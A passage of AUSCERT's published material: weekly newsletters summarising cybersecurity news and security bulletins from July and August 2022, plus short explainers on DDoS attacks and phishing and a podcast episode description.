Publications

Greetings, This Sunday, August 21, marks the final day of this year’s National Science Week. An annual celebration of science and technology, it’s a great opportunity to imbue curious minds with knowledge and insights into a plethora of areas. Everything from agriculture, health and medicine, technology and the great expanse of space is available to explore, analyze, experience and challenge as we seek to understand, innovate, and transform. Learn more about what others are doing and what you can do by visiting the National Science Week website. The realm of cyber is one area that is constantly evolving and something that we here at AUSCERT like to maintain awareness of which, we then share with our members. A fantastic way to gain insights and understanding on an array of topics is through our podcast series, Share today, save tomorrow. With fourteen episodes currently available, you can select from several areas that may pique your interest including ‘ITOT Convergence’, ‘Strategic Resilience and Psychology in Cyber Security’ and our latest edition, ‘Diversity and Culture in Cyber Security’. Another means of seeking to understand is through the tried-and-true method of simply asking. The team at RMIT University are doing just that in their survey that seeks to gain a more accurate picture of the security industry in Australia. You can share your insights and experience to help expand and diversify the workforce and help understand and prepare for future challenges. Apple releases Safari 15.6.1 to fix zero-day bug used in attacks Date: 2022-08-18 Author: Bleeping Computer [See AUSCERT Security Bulletin ESB-2022.4103 for more information] Apple has released Safari 15.6.1 for macOS Big Sur and Catalina to fix a zero-day vulnerability exploited in the wild to hack Macs. The zero-day patched today (CVE-2022-32893) is an out-of-bounds write issue in WebKit that could allow a threat actor to execute code remotely on a vulnerable device. “Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited,” warns Apple in a security bulletin released today. Google Chrome Zero-Day Found Exploited in the Wild Date: 2022-08-18 Author: Dark Reading [See AUSCERT Bulletins ESB-2022.4128 & ESB-2022.4102 for more information] A zero-day security vulnerability in Google’s Chrome browser is being actively exploited in the wild. The Internet behemoth released 11 security patches for Chrome this week, which are now being pushed out in stages to those with automatic updates enabled for Windows, Mac, and Linux; however, everyone can manually update now. The zero-day (CVE-2022-2856) is rated as high severity and involves “insufficient validation of untrusted input in Intents,” according to Google’s advisory. Intents, where the bug resides, are used by Chrome to process user input; if the browser doesn’t validate this input properly, an attacker is able to specially craft an input (say, a post in the comments section of a website) that’s not expected by the application. Twilio phish sees Signal users’ numbers at risk of re-registering Date: 2022-08-16 Author: IT News Locally stored user information can’t be compromised, company says. Fallout from the recent phising attack on communications company Twilio has spilt over to encrypted messaging app Signal, with users reporting bogus number re-registration attempts. Twilio provides Signal with phone number verification services, meaning the attacker may have been able to learn that some numbers were associated with Signal users. Digital Ocean dumps Mailchimp after attack leaked customer email addresses Date: 2022-08-16 Author: The Register Junior cloud Digital Ocean has revealed that some of its clients’ email addresses were exposed to attackers, thanks to an attack on email marketing service Mailchimp. This story starts last week when some of the blockheads in crypto-land noticed that email marketing service Mailchimp had suspended service for some of their fellow travellers. Reports such as this missive noted that Mailchimp has previously ditched crypto clients for generating more abuse reports than other customers, and the company’s Acceptable Use Policy therefore warns it may decide not to serve companies that offer “Cryptocurrencies, virtual currencies, and any digital assets related to an Initial Coin Offering.” How a spoofed email passed the SPF check and landed in my inbox Date: 2022-08-16 Author: WeLiveSecurity According to one study published in 2022, around 32% of the 1.5 billion domains investigated had SPF records. Out of these, 7.7% had invalid syntax and 1% were using the deprecated PTR record, which points IP addresses to domain names. Uptake of SPF has been slow and flawed indeed, which might lead to another question: how many domains have overly permissive SPF records? Zoom Patches Serious macOS App Vulnerabilities Disclosed at DEF CON Date: 2022-08-16 Author: Security Week [See AUSCERT Security Bulletin ESB-2022.4080 for more information] Zoom informed customers last week that macOS updates for the Zoom application patch two high-severity vulnerabilities. Details of the flaws were disclosed on Friday at the DEF CON conference in Las Vegas by macOS security researcher Patrick Wardle. Wardle, who is the founder of the Objective-See Foundation, a non-profit that provides free and open source macOS security resources, showed at DEF CON how a local, unprivileged attacker could exploit vulnerabilities in Zoom’s update process to escalate privileges to root. Thousands of VNC Instances Exposed to Internet as Attacks Increase Date: 2022-08-15 Author: Security Week Dark web intelligence firm Cyble reports seeing an increase in cyberattacks targeting virtual network computing (VNC). The VNC graphical desktop-sharing system relies on the Remote Frame Buffer (RFB) protocol to provide control of a remote machine over a network. Exposing VNC to the internet has long been deemed a security risk, yet Cyble has identified over 8,000 internet-accessible VNC instances that have authentication disabled. ESB-2022.4080 – Zoom Client for Meetings for macOS: CVSS (Max): 8.8 Zoom reported Local Privilege Escalation in Zoom Client for Meetings for macOS. Applying current updates or downloading the latest Zoom software is recommended. ESB-2022.4077 – Splunk Enterprise: CVSS (Max): 7.4 A vulnerability in Splunk Enterprise that affects connections between Splunk Enterprise and Ingest Actions Destination has been reported. Splunk customers are advised to upgrade Splunk Enterprise 9.0.0 to 9.0.1 or higher. ESB-2022.4102 – ALERT Google Chrome: CVSS (Max): None Google Chrome released an update for Stable Channel and Extended Stable Channel. Google advised that this update will be rolled out over the coming days/weeks. ESB-2022.4103 – Safari 15.6.1: CVSS (Max): None Safari 15.6.1 has been released to address an issue in WebKit and is available for macOS Big Sur and macOS Catalina. Apple has reported that this issue may have been actively exploited. ESB-2022.3992.2 – UPDATE PAN-OS: CVSS (Max): 8.6 Palo Alto Networks has identified a vulnerability in URL Filtering, which , if exploited could allow a network-based attacker to conduct reflected and amplified TCP denial-of-service (RDoS)attacks. Stay safe, stay patched and have a good weekend! The AUSCERT team

Greetings, “Malvertising” is a term that has gained some attention this week as it grows in use to infiltrate networks and devices. (also known as a browser-in-browser (BitB) attack. The term refers to malicious advertising, a practice that uses online advertising that appears genuine that requires very little or even no interaction from the user. To help understand and combat such campaigns, National Cyber Security News Today provides an examination of the potential threat and, how to safeguard against it. AUSCERT wanted to remind folk that the deadline for the .au. direct domain availability, and its implications, are fast approaching. As per the ACSC alert, Australians have until 20 September 2022 to seek priority allocation of an .au direct domain name that matches their existing domain name. AUSCERT published a blog on the changes to assist members to understand potential threats and provide our members with an analysis of the situation. Lastly, we wanted to acknowledge World Youth Day, a UN initiative that focuses on education, employment, the environment, delinquency, girls and young women, HIV/AIDS and intergenerational relations as well as conflict resolution and social justice, to name a few, held each year on August 12 (today!). Organizations Warned of Critical Vulnerabilities in NetModule Routers Date: 2022-08-10 Author: Security Week Flashpoint is warning organizations of two newly identified critical vulnerabilities in NetModule Router Software (NRSW) that could be exploited in attacks. Acquired by Belden earlier this year, NetModule provides IIoT and industrial routers, vehicle routers, and other types of wireless M2M connectivity products. All of NetModule’s routers run the Linux-based NRSW by default, and can be managed remotely using a remote management platform. Cisco hacked by Yanluowang ransomware gang, 2.8GB allegedly stolen Date: None Author: Bleeping Computer Cisco confirmed today that the Yanluowang ransomware group breached its corporate network in late May and that the actor tried to extort them under the threat of leaking stolen files online. The company revealed that the attackers could only harvest and steal non-sensitive data from a Box folder linked to a compromised employee’s account. Meraki firewalls blocked Office365 traffic as attempted intrusion Date: 2022-08-11 Author: iTnews Microsoft Office365 users behind Cisco Meraki firewalls found themselves unable to reach their services, after the security vendor inadvertently blocked legitimate traffic. The firewalls were identifying legitimate traffic as an attempted denial-of-service attack against Windows IIS, as reported in this Reddit post. “We use Meraki firewalls and starting this morning Meraki was blocking valid Microsoft IPs in the Security Center. The SNORT rule details were ‘Microsoft Windows IIS denial-of-service attempt” and the destination IPs were Microsoft’,” the post states. SNORT is an open source signature-based intrusion prevention system. Patch Wednesday fixes two-year-old Dogwalk vulnerability Date: 2022-08-10 Author: iTnews Microsoft has fixed a remote code execution vulnerability in its MSDT diagnostics tool for Windows, first reported to the company two years ago and rediscovered in May this year. The fix is part of this month’s Patch Wednesday, and was named Dogwalk by security researchers. Although researcher Imre Rad reported the bug to Microsoft in January 2020, and despite the vulnerability raising its head again this year, the software giant initially declined to fix the issue. New GwisinLocker ransomware encrypts Windows and Linux ESXi servers Date: 2022-08-06 Author: Bleeping Computer A new ransomware family called ‘GwisinLocker’ targets South Korean healthcare, industrial, and pharmaceutical companies with Windows and Linux encryptors, including support for encrypting VMware ESXi servers and virtual machines. The new malware is the product of a lesser-known threat actor dubbed Gwisin, which means “ghost” in Korean. The actor is of unknown origin but appears to have a good knowledge of the Korean language. Dark web investigation uncovers ransomware marketplace Date: 2022-08-05 Author: Cyber Security Connect A new Venafi dark web investigation has uncovered 475 webpages of sophisticated ransomware products and services, with ransomware-as-a-service (RaaS) being the most accessible for procurement. The research was conducted between November 2021 and March 2022 in partnership with criminal intelligence provider Forensic Pathways. Over 35 million dark web URLs were analysed, including marketplaces and forums, using the Forensic Pathways dark search engine. The researchers found that many strains of ransomware being sold have been successfully used in high-profile attacks, with 87 per cent of the ransomware found on the dark web capable of delivering malicious macros in order to infect targeted systems. These include Babuk, GoldenEye, Darkside/BlackCat, Egregor, HiddenTear and WannaCry. Windows devices with newest CPUs are susceptible to data damage Date: 2022-08-08 Author: Bleeping Computer Microsoft has warned today that Windows devices with the newest supported processors are susceptible to “data damage” on Windows 11 and Windows Server 2022. “Windows devices that support the newest Vector Advanced Encryption Standard (AES) (VAES) instruction set might be susceptible to data damage,” the company revealed today. Devices affected by this newly acknowledged known issue use AES-XTS (AES XEX-based tweaked-codebook mode with ciphertext stealing) or AES-GCM (AES with Galois/Counter Mode) block cipher modes on new hardware. Over 60% of Organizations Expose SSH to the Internet Date: 2022-08-05 Author: Infosecurity Magazine A majority of global organizations are exposing sensitive and insecure protocols to the public internet, potentially increasing their attack surface, according to ExtraHop. The vendor analyzed a range of enterprise IT environments to benchmark cybersecurity posture based on open ports and sensitive protocol exposure. It found that 64% of those studied have at least one device exposing SSH, which could allow attackers to probe it for remote access. Microsoft’s big Patch Tuesday fixes exploited zero-day flaw and 120 more bugs Date: 2022-08-10 Author: ZDNet Microsoft has released patches for 141 flaws in its August 2022 Patch Tuesday update including two previously undisclosed (zero-day) flaws, of which one is actively being exploited. The total patch count for the August 2022 Patch Tuesday Update actually includes 20 flaws in Edge that Microsoft had previously released fixes for, leaving 121 flaws affecting Windows, Office, Azure, .NET Core, Visual Studio and Exchange Server. The Zero Day Initiative noted that the volume of fixes released this month is “markedly higher” than what is normally expected in an August release. “It’s almost triple the size of last year’s August release, and it’s the second largest release this year,” the bug hunting group said. Hackers Exploit Twitter Vulnerability to Exposes 5.4 Million Accounts Date: 2022-08-06 Author: The Hacker News Twitter on Friday revealed that a now-patched zero-day bug was used to link phone numbers and emails to user accounts on the social media platform. “As a result of the vulnerability, if someone submitted an email address or phone number to Twitter’s systems, Twitter’s systems would tell the person what Twitter account the submitted email addresses or phone number was associated with, if any,” the company said in an advisory. Slack Resets Passwords After a Bug Exposed Hashed Passwords for Some Users Date: 2022-08-06 Author: The Hacker News Slack said it took the step of resetting passwords for about 0.5% of its users after a flaw exposed salted password hashes when creating or revoking shared invitation links for workspaces. “When a user performed either of these actions, Slack transmitted a hashed version of their password to other workspace members,” the enterprise communication and collaboration platform said in an alert on 4th August. ESB-2022.3942 – Intel Data Center Manager: CVSS (Max): 9.0 Intel reports that a vulnerability in the Intel Data Center Manager may allow escalation of privilege or denial of service. ESB-2022.3975 – OpenShift Container Platform 4.11.0: CVSS (Max): 9.8 Security updates for Red Hat OpenShift Container Platform 4.11 contain packages and images that fix several bugs and add enhancements. ESB-2022.3966 – Adobe Commerce and Magento Open Source: CVSS (Max): 9.1 Adobe’s most recent update for Adobe Commerce and Magento Open Source resolves critical , important and moderate vulnerabilities which , if exploited could lead to arbitrary code execution, privilege escalation and security feature bypass. ESB-2022.3962 – ALERT Open AMT Cloud Toolkit: CVSS (Max): 9.9 Intel has released updates to mitigate a potential vulnerability in the Open AMT Cloud Toolkit software which , if exploited could allow escalation of privilege. ASB-2022.0182 – ALERT Windows 7 and Windows Server 2008: CVSS (Max): 9.8 Microsoft’s security patch update for August 2022 resolves 29 vulnerabilities across Windows 7 and Windows Server 2008. Microsoft reports this vulnerability is publicly disclosed and actively exploited and recommends updating the software with the version made available. ASB-2022.0181 – ALERT Microsoft Windows: CVSS (Max): 9.8* Microsoft’s security patch update for August 2022 contain fixes for 61 vulnerabilities in Windows, Windows RT and Windows 7. Microsoft reports this vulnerability is publicly disclosed and actively exploited and recommends updating the software with the version made available. ESB-2022.3764.2 – UPDATE ALERT VMware products: CVSS (Max): 9.8 Multiple vulnerabilities were reported in VMware Workspace ONE Access, Access Connector, Identity Manager, Identity Manager Connector and vRealize Automation. VMware recommends that these critical vulnerabilities should be patched or mitigated immediately. Stay safe, stay patched and have a good weekend! The AUSCERT team

What is distributed denial of service (DDoS) & How Does it Work? The AUSCERT team provides proactive and reactive incident response assistance actively seeking information from various sources to help find data relevant to a client. We take immediate action and follow well-defined protocols in order to obtain a resolution and satisfactory outcome. This article is aimed at those who need a high level explanation of what a DDoS attack is. DDoS Attacks In 2022 Already in 2022 the IT industry has experienced a large increase of distributed denial of service (DDoS) attacks. Not that long ago, most DDoS attacks were seen as minor nuisances perpetrated by harmless novices who did it for fun, back then DDoS attacks were relatively easy to mitigate.   DDoS attacks are becoming an extremely sophisticated activity, and in many cases, big business. According to TechRepublic, in the first quarter of 2022, Kaspersky DDoS Intelligence systems detected 91,052 DDoS attacks. 44.34% of attacks were directed at targets located in the USA, which comprised 45.02% of all targets.   Exactly What Is a DDoS Attack? Despite DDoS attacks becoming ever more common, they can be quite sophisticated and difficult to combat. But what exactly is a DDoS attack and what does DDoS stand for? DDoS is the anagram for Distributed Denial of Service. A DDoS attack occurs when a threat actor uses resources from multiple, remote locations to attack an organisation’s online operations. The goal is to consume resources so that legitimate access to services is not possible, for example, a website or online service will appear to be ‘down’ for people attempting to use it. DDoS attacks usually focus on generating a huge amount of network traffic that overwhelm operations of network equipment and services such as routers, domain name services or web caching. How Long Can DDoS Attacks Last For? The short answer – there is no set duration. DDoS attacks vary extensively in both duration and sophistication: Long-Term Attack: An attack waged over a period of hours or days is referred to as a long-term attack. For example, the largest recorded DDoS attack was against Amazon Web Services (AWS), this caused disruption for three days before finally being finally mitigated. Burst Attack: Also known as pulse-wave attacks, as the name implies they are waged over a very short period of time, lasting from a few seconds to a few minutes and occurring in frequent bursts. Again, time is not really a factor; the quicker, burst attacks can also be as damaging as the long-term attacks.   How to Protect Your Organisation Against DDoS Attacks Some measures that organisations can take to protect themselves against DDoS attacks are: Reduce the attack surface of Internet-visible services to only that which is required. For example, inbound ICMP packets are unlikely to be needed and should be blocked. Use a Content Delivery Network (CDN). Implement server-level DDoS mitigation measures, making use of best practice guides from application and operating system software providers. Plan for disruption including alternative ways of providing services to clients. Short term increases in network or server capacity may be a solution, depending on the costs. Knowing these in advance will inform business continuity planning discussions. Implementing monitoring systems to detect large increases in outbound network traffic to avoid becoming part of the problem and the cause of reputational damage. Phishing Take-down service AUSCERT’s Phishing Take-down service works to reduce brand damage by requesting the removal of fraudulent websites. The service puts the safety of your brand at the forefront by detecting and acting immediately if your organisation is affected. To find out more about this service click here.

What is Phishing? Phishing is an attack whereby the attacker impersonates a reputable entity or person in email or other forms of communication, such as SMS or instant messaging. Most commonly attackers will use phishing emails to distribute malicious links or attachments that can perform a variety of malicious functions. Phishing Attacks A phishing attack can have devastating results. For individuals, this includes unauthorised purchases, electronic theft of money, or identity theft. Phishing attacks can often be used to gain a foothold into an organisation’s network, as a part of a larger attack, such as ransomware or Business Email Compromise. This happens when employees are compromised in order to bypass security controls and distribute malware or fraudulent messaging inside the victim organisation. A successful attack on an organisation can have severe implications such as financial losses and extended outages, in addition to a reduction of market share, damaged reputation, and loss of customer trust. Types Of Phishing Attacks Email Phishing Scams In the most common version of email-based phishing, the attacker sends out thousands of fraudulent messages with the intent of gathering personal information, account credentials or for financial gain. This type of attack is very much a numbers game, even if 1% of several thousand recipients fall for the scam, then the attack can be considered successful. As with legitimate marketing campaigns, to improve success rates fraudsters will also take the time and effort to maximise their effort by trialling different messaging and tactics and studying their relative success rates.  They will clone emails from a spoofed organisation, by using the same phrasing, typefaces, logos, and signatures to make the messages appear legitimate. Additionally, attackers will commonly try to push users into action by creating a sense of urgency. For example, an email could threaten account expiration and place the recipient on a deadline. By applying a time-sensitive cue, users are more likely to act sooner rather than later, without much thought. These scams can be hard to spot, typically having a misspelt website address or extra subdomain, so for example www.commbank.com.au/login could be www.combank.com.au/login. The similarities between the two website addresses give the impression of a legitimate link, making it more difficult to discover an attack is taking place. Spear Phishing This is a more precisely focused attack as spear phishing targets a specific person or organisation, as opposed to thousands of people as described above. It’s a more specific type of phishing that often incorporates special knowledge about an organisation, such as its staff members’ names and titles, organisational structure and clients. A common spear phishing attack scenario is where the attackers will research names of employees within an organisation’s marketing department in order to gain access to the latest project invoices. Posing as a marketing director, the attacker emails a departmental project manager (PM) using a subject line that reads something like: “Updated invoice for Q3 campaigns”. This email will be a clone of the organisation’s standard email template. A link in the email redirects to a password-protected internal document, which is simply a spoofed version of a stolen invoice. The PM is requested to log in to view the document. The attacker steals the login credentials, gaining full access to sensitive areas within the organisation’s network. By providing an attacker with valid login credentials, spear phishing is an effective method for executing the first stage of further attacks, such as ransomware or Business Email Compromise. How To Prevent Phishing To protect against phishing attacks some steps should be taken by both employees and enterprises. For employees, simple vigilance is vital. A spoofed message will almost always contain subtle differences that expose their fraudulent purpose. These frequently include spelling errors such as website names. Users should also stop and think about why they’re even receiving the email and if it seems unusual or out of character for the alleged sender. At an enterprise level, a number of steps can be taken to mitigate both phishing and spear phishing attacks: Two-factor authentication (2FA) is the most effective method for countering phishing attacks, as it adds an extra verification layer when logging in to applications. 2FA relies on users having two things: something they know, such as a password and username, and something they have, such as a mobile phone running an authentication app. Organisations should enforce a strict password management policy that takes into account how people actually behave. For example, staff should be required to use passwords that are difficult for an attacker to guess but not so complex they can’t be remembered by people. Passphrases are often a better strategy than complex passwords. Password managers combine convenience and strong passwords and their use should be encouraged. Staff should be educated not to reuse the same password for multiple accounts, as this makes password spraying attacks much easier. Empowering employees through engaging and informative cyber security awareness training will help reduce the threat of most cyber security attacks, including phishing. Enable SPF and DMARC to make it more difficult for attackers to send email faking an organisation’s identity. Early Warning SMS Early warning notifications assist in managing critical security threats to your network. AUSCERT monitors malicious activity online and the Early Warning Service provides SMS notifications of any immediate and serious threats relevant to your industry. To find out more about this service click here.

Greetings, It’s been three years since the smell of dagwood dogs filled the air along with the screams and laughter from people on rides at Sideshow Alley but, the Ekka is back in full swing for 2022! An event that brings the country and the city together, the Ekka is much loved in Brisbane and sees over 400,000 people attend each year. So, if you’re visiting the River City between August 6 – 14, perhaps a trip to the RNA Showgrounds is in order? There’s plenty to see, do and eat – including the popular and delicious strawberry sundaes! Another audible array that may delight, is the sound of discussing topics that inform, entertain and perhaps, make you think! Such a treat can be found in the latest episode of our podcast, Share Today, Save Tomorrow that focuses on Diversity and Culture in Cyber Security. The episode features chats with Sasenka Abeysooriya, about changing behaviours and influencing organisational culture and Jasmine Woolley, a proud First Nations woman, on how she utilises Indigenous knowledge to provide a fresh perspective on emerging threats to Australia’s security. If you’re new to the world of cyber or, you have a curious mind and would like to learn more about information security principles, the next round of AUSCERT’s Intro to Cyber for IT Professionals training is taking place in late August. Facilitated by our Principal Analyst and a guest industry trainer, our two half-day courses are aimed at engaging attendees with interactive content and a focus on delivering effective training outcomes. You can view the full list of our 2022 training schedule HERE. New Traffic Light Protocol standard released after five years Date: 2022-08-04 Author: Bleeping Computer The Forum of Incident Response and Security Teams (FIRST) has published TLP 2.0, a new version of its Traffic Light Protocol (TLP) standard, five years after the release of the initial version. The TLP standard is used in the computer security incident response team (CSIRT) community to facilitate the greater sharing of sensitive information. Students at top universities in Australia, the US and UK at risk of fraud Date: 2022-08-02 Author: Cyber Security Connect Proofpoint’s new research has found that the top universities in Australia, the United States and the United Kingdom are lagging on basic cyber security measures, subjecting students, staff and stakeholders to higher risks of email-based impersonation attacks. According to Proofpoint’s analysis, universities in the United States are most at risk with the poorest levels of protection, followed by the United Kingdom, then Australia. Australia charges dev of Imminent Monitor RAT used by domestic abusers Date: 2022-07-31 Author: Bleeping Computer ​An Australian man was charged for developing and selling the Imminent Monitor remote access trojan, used to spy on victims’ devices remotely. A remote access trojan is a type of malware that allows full remote access to an infected device, including the ability to execute commands, log keystrokes, steal files and data, install additional software, take screenshots, and even record video from the device’s webcam. These types of malware are very popular among hackers due to its cheap price and the unfettered access it provided to infected devices. However, they are also popular with domestic abusers who use them to spy on their victims. Decentralized IPFS networks forming the ‘hotbed of phishing’ Date: 2022-07-29 Author: The Register Threat groups are increasingly turning to InterPlanetary File System (IPFS) peer-to-peer data sites to host their phishing attacks because the decentralized nature of the sharing system means malicious content is more effective and easier to hide. Threat analysts with cybersecurity vendor Trustwave this week said the InterPlanetary File System (IPFS) is becoming the “new hotbed of phishing” after seeing an increase in the number of phishing emails that contain IPFS URLs. At the same time, Atif Mushtaq, founder and chief product officer at anti-phishing company SlashNext, told The Register that his company is detecting phishing hosted on ipfs.io, cloudflare-ipfs.com and other vendor systems. LockBit Ransomware Abuses Windows Defender for Payload Loading Date: 2022-08-01 Author: Security Week A LockBit ransomware operator or affiliate has been abusing Windows Defender to decrypt and load Cobalt Strike payloads during attacks, according to endpoint security firm SentinelOne. In April, SentinelOne reported that, in an attack involving LockBit ransomware, threat actors had leveraged a legitimate VMware command-line utility named ‘VMwareXferlogs.exe’ to side-load a Cobalt Strike payload. In a different attack observed by the cybersecurity firm, the attacker leveraged a command-line tool associated with Windows Defender. Specifically, the hackers used ‘MpCmdRun.exe’ to decrypt and load post-exploitation Cobalt Strike payloads. ESB-2022.3764 – ALERT VMware products: CVSS (Max): 9.8 VMware has released patches to address multiple vulnerabilities in affected VMware products ESB-2022.3793 – OpenJDK 17.0.4: CVSS (Max): 7.5 Redhat build of OpenJDK is now available for portable linux fixing several vulnerabilities ESB-2022.3837 – Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers: CVSS (Max): 9.8 Cisco has released software updates to address several vulnerabilities affecting small business RV series routers ESB-2022.3876 – BIG-IP (all modules): CVSS (Max): 8.7 A bypass restriction vulnerability with a CVSS of 8.7 has been fixed on BIG-IP Stay safe, stay patched and have a good weekend! The AUSCERT team

LISTEN HERE: AUSCERT “Share Today, Save Tomorrow”, Episode 14, Diversity and Culture in Cyber Security In this episode, AUSCERT features the following guests: Sasenka Abeysooriya, The University of Queensland Jasmine Woolley, Trustwave Anthony sits down with Sasenka Abeysooriya, a skilled and passionate strategist, innovative thinker and strong communicator, about sustainable and long-term solutions by changing behaviours and influencing organisational culture. Later in the episode, Anthony talks with Jasmine Woolley, a proud First Nations woman, who shares her unique journey into cyber security and how she has utilised her Indigenous knowledge to provide a fresh perspective on emerging threats to Australia’s security. This episode was hosted by Anthony Caruana. Our podcasts aim to provide fascinating insights, great stories from the field and lessons you can take back to your workplace. If you have any ideas or suggestions for what we can talk about, please let us know! The AUSCERT podcast can also be found on Spotify, Apple Podcasts and Google Podcasts.

Greetings, Great ideas were delivered with enthusiasm and with a hint of competitiveness at the AUSCERT Team Planning and Strategy Day earlier this week. It was a great opportunity for the teams to collaborate, brainstorm and put forward ideas and projects that focus on improving internal efficiencies and delivering the best service possible to our members. Now, it’s up to all of us to turn the ideas into reality so, watch this space! An idea that wasn’t popular was the controversial use of facial recognition technology in Bunnings and Kmart stores which was ‘paused’ earlier in the week following a significant public backlash. Positioned as a means of preventing theft, the stores are insistent that the use of such technology is legitimate. However, as reported in a recent Choice article, the decision to use facial recognition technology in this manner will be a matter for the Office of the Australian Information Commissioner (OAIC) to decide. Tomorrow, June 30, Is World Friendship Day. Originally developed by Hallmark as a means of creating another holiday in which to exchange cards, the concept of honouring friendship soon took over and it became a popular custom to reserve a day to celebrate friends. With the growth in social media across the globe, the General Assembly of the United Nations declared in 2011 that June 30 shall be a day to celebrate, connect and bring together people from all backgrounds. Atlassian Patches Servlet Filter Vulnerabilities Impacting Multiple Products Date: 2022-07-21 Author: Security Week [See also: ESB-2022.3575] Servlet Filters are pieces of Java code designed to intercept and process HTTP requests sent between a client and a backend. Servlet Filters may offer security mechanisms such as auditing, authentication, logging, or authorization. Tracked as CVE-2022-26136 and described as a Servlet Filter bypass, the first of the flaws could allow a remote, unauthenticated attacker to send specially crafted HTTP request and authenticate to third-party apps, or to launch a cross-site scripting (XSS) attack, to execute JavaScript code in a user’s browser. Microsoft issues emergency fix for broken Windows 11 start menu Date: 2022-07-25 Author: Bleeping Computer Microsoft has addressed a known issue that was causing the start menu on some Windows 11 to malfunction after installing recent updates. This known issue affects only devices running Windows 11, version 21H2, and it was acknowledged on Friday after Redmond received customer reports of start menu issues affecting some systems. “A small number of devices are unable to open the Start menu after installing updates released June 23, 2022 or later,” the company explained in a recent update on the Windows health dashboard. Hackers scan for vulnerabilities within 15 minutes of disclosure Date: 2022-07-26 Author: Bleeping Computer System administrators have even less time to patch disclosed security vulnerabilities than previously thought, as a new report shows threat actors scanning for vulnerable endpoints within 15 minutes of a new CVE being publicly disclosed. According to Palo Alto’s 2022 Unit 42 Incident Response Report, hackers are constantly monitoring software vendor bulletin boards for new vulnerability announcements they can leverage for initial access to a corporate network or to perform remote code execution. However, the speed at which threat actors begin scanning for vulnerabilities puts system administrators in the crosshairs as they race to patch the bugs before they are exploited. Multiple Windows, Adobe Zero-Days Anchor Knotweed Commercial Spyware Date: 2022-07-28 Author: Dark Reading A cyber-weapons broker dubbed Knotweed has been outed, with Microsoft flagging it as being behind numerous spyware attacks on law firms, banks, and strategic consultancies in countries around the world. To boot, Knotweed has made a habit of incorporating rafts of Windows and Adobe zero-day exploits into its spyware since at least 2021, according to Microsoft. Hacker puts 5.4m Twitter account details on sale with $30k price tag Date: 2022-07-26 Author: Cyber Security Connect A hacker has put a database of phone numbers and email addresses belonging to 5.4 million Twitter accounts for sale on the dark web for $30,000. Twitter is currently investigating the breach according to reports by CyberWire. The hack is linked with a cyber breach that occurred in January this year according to Restore Privacy, after tracking down HackerOne reports that observed the January incident “had potential of exposing user information even when hidden behind privacy settings”. Restore Privacy has also found that Twitter paid a bug bounty to the researcher who had reported the breach, then enabled the short-form social media platform to close it, but that earlier vulnerability appears to have been “exploited to collect a very large tranche of user data”. Ransomware Continues to Disrupt OT Operations Date: 2022-07-28 Author: Cyber Security Connect At the end of 2021, Dragos assessed with high confidence that ransomware would continue to disrupt OT operations into 2022. So far, that assessment holds true. Although we don’t have substantive evidence that the quantity of ransomware incidents has increased year on year, a surge of ransomware initial access campaigns in 2022 shows specific ransomware groups like Conti are more active. Also, the political tension between Russia and western countries may only exacerbate this. Bunnings and Kmart halt use of facial recognition technology in stores as privacy watchdog investigates Date: 2022-07-25 Author: The Guardian Kmart and Bunnings have paused the use of facial recognition technology in their stores, amid an investigation from Australia’s privacy regulator. Consumer group Choice last month revealed Bunnings and Kmart were using the technology – which captures images of people’s faces from video cameras as a unique faceprint that is then stored and can be compared with other faceprints – in what the companies say is a move to protect customers and staff and reduce theft in select stores. The two companies are now being investigated by the Office of the Australian Information Commissioner (OAIC) over their use of the technology and whether it is consistent with privacy laws. Microsoft Edge now improves performance by compressing disk cache Date: 2022-07-27 Author: Bleeping Computer Microsoft says Microsoft Edge users will notice improved performance and a smaller disk footprint because the web browser now automatically compresses disk caches. “Beginning with Microsoft Edge 102 on Windows, Microsoft Edge automatically compresses disk caches on devices that meet eligibility checks, to ensure the compression will be beneficial without degrading performance,” the Microsoft Edge Team said Wednesday. “This ensures compression of these caches largely improves performance and overall user experience.” ESB-2022.3656 – Firefox: CVSS (Max): None Mozilla has updated Firefox to version 103 to patch multiple vulnerabilities ESB-2022.3576 – Google Chrome: CVSS (Max): None Multiple vulnerabilities have been fixed in Google Chrome version 103.0.5060.134 ESB-2022.3706 – Samba: CVSS (Max): 8.8 Samba has addressed a security vulnerability that allows Samba AD users to forge password change requests for any user including Admin ESB-2022.3685 – Red Hat OpenShift Service Mesh 2.1.3: CVSS (Max): 10.0 Red Hat has released a critical security update for Red Hat OpenShift Service Mesh addressing a trivial bypass vulnerability ASB-2022.0175.2 – Sonicwall GMS (Global Management System)and Analytics On-Prem products : CVSS (Max): None SonicWall has released security advisories about an SQL Injection vulnerability affecting GMS (Global Management System) and Analytics On-Prem products Stay safe, stay patched and have a good weekend! The AUSCERT team

Greetings, Yesterday saw the majority of Australia and New Zealand Microsoft users impacted by the Microsoft Teams outage, AUSCERT included. It is being reported that the outage was caused by "a recent deployment [that] contained a broken connection to an internal storage service". We hope this gave users the chance to celebrate National Lamington Day. The humble lamington has been a part of the Australian tradition since the 1800s. Yet, the lamington is another dessert that has its origins disputed, much like the pavlova. Car hacking is not just for the movies anymore, but came closer to reality this week with the discovery of the unpatched bug in the MiCODUS GPS device. The vulnerability can allow attackers to restrict fuel intake, monitor the location of vehicles and even stop the vehicles. Currently, there is no patch that can be applied to mitigate this bug. … Cisco Patches Severe Vulnerabilities in Nexus Dashboard Date: 2022-07-21 Author: Security Week [ESB-2022.3545] Cisco on Wednesday announced the availability of patches for multiple vulnerabilities in Nexus Dashboard, including a critical-severity issue that could lead to the execution of arbitrary commands. The Nexus Dashboard is a data center management console that provides administrators and operators with quick access to required resources across services and applications. The most severe of the newly resolved vulnerabilities affecting the console is CVE-2022-20857 (CVSS score of 9.8), which could allow a remote, unauthenticated attacker to access a specific API and execute arbitrary commands. Hacker Abusing Windows NFS Remote Code Execution Flaw Date: 2022-07-20 Author: Cyware The vulnerability, tracked as CVE-2022-30136, was patched in June, however, the report provided more detailed information about potential exploitation. The flaw is contained within Windows NFS and occurs due to improper handling of NFSv4 requests. It could be abused by sending malicious RPC calls to a target server. Further, successful exploitation could result in arbitrary code execution as SYSTEM. On the other side, unsuccessful exploitation could even crash the system. Microsoft Teams outage widens to take out M365 services, admin center Date: 2022-07-21 Author: The Register Microsoft acknowledged the issue at 01:47 UTC on July 21 and offered the following update around 75 minutes later. The outage appears to be global, but Microsoft is perhaps a little fortunate that the incident struck when the working day was all but over in the US, and in the dark of the European night. Most of the reaction The Register can find is therefore from the Asia-Pacific region, where businesses such as an Australian horse-racing organization have been disrupted. LDAP Account Manager bug poses unauthenticated remote code execution risk Date: 